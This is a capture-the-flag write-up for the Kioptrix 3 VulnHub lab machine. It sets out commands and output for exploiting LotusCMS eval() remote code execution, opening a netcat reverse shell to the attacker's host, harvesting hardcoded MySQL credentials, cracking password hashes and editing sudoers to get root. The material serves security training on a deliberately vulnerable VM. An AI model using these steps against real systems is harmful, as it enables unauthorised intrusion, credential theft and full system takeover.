kioptrix3-VulnHub

This is the write-up for kioptrix3 from VulnHub.

This can be found at :- https://www.vulnhub.com/entry/kioptrix-level-12-3,24/

Download the VM and used your choice to VM software to deploy the Virtual Machine.

Lets start and keep in mind that the VM IP can be different in your case

Enumeration
===========
⇒ NMAP Open Port 22 and 80. Lets browse to http://192.168.56.106/
⇒ LotusCMS
⇒ LotusCMS 3.0 - 'eval()' Remote Command Execution

Exploit
=======
⇒ https://raw.githubusercontent.com/Hood3dRob1n/LotusCMS-Exploit/master/lotusRCE.sh
⇒ Path found, now to check for vuln....
</html>Hood3dRob1n
Regex found, site is vulnerable to PHP Code Injection!

About to try and inject reverse shell....
what IP to use?
192.168.56.102
What PORT?
9999

OK, open your local listener and choose the method for back connect:
1) NetCat -e 3) NetCat Backpipe 5) Exit
2) NetCat /dev/tcp 4) NetCat FIFO
#? 1

⇒ Got Reverse Shell
⇒ Stabilize Shell
    • python -c 'import pty;pty.spawn("/bin/bash")'
    • control+z to background
    • stty raw -echo
    • fg
    • export TERM=xterm
⇒ www-data@Kioptrix3:/home/www/kioptrix3.com$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Privilege Escalation
=================
⇒ www-data@Kioptrix3:/home/loneferret$ find / -perm -u=s -type f 2>/dev/null
    • /usr/local/bin/ht
⇒ www-data@Kioptrix3:/home/loneferret$ cat CompanyPolicy.README
    Hello new employee,
    It is company policy here to use our newly installed software for editing, creating and viewing files.
    Please use the command 'sudo ht'.
    Failure to do so will result in you immediate termination.

    DG
    CEO
⇒ /usr/local/bin/ht /etc/sudoers
    • # User privilege specification
    │root?ALL=(ALL) ALL
    │loneferret ALL=NOPASSWD: !/usr/bin/su, /usr/local/bin/ht

⇒ Find hard coded password
    • find /home/www -type f -exec grep -Hn password {} \; 2>/dev/null
        ◇ Found mysql credential in /home/www/kioptrix3.com/gallery/gconfig.php
⇒ Login to http://192.168.56.106/phpmyadmin/ with above credentials.
    • Found user and hashes in gallery⇒ dev_accounts for users “dreg” and “loneferret”
    • Cracked both hasjes easily using https://crackstation.net/
⇒ Login via SSH using user “loneferret” and the cracked password and ran sudo -l
    • loneferret@Kioptrix3:~$ sudo -l
    User loneferret may run the following commands on this host:
    (root) NOPASSWD: !/usr/bin/su
    (root) NOPASSWD: /usr/local/bin/ht
    • edit /etc/sudoers file using /usr/local/bin/ht using sudo and got error:
    ◇ Error opening terminal: xterm-256color.
    ◇ Search for error and solution was to run “export TERM=xterm”
    ◇ Run again sudo /usr/local/bin/ht /etc/sudoers and add /bin/sh for use loneferret
    ◇ Run sudo /bin/sh ⇒ We get root shell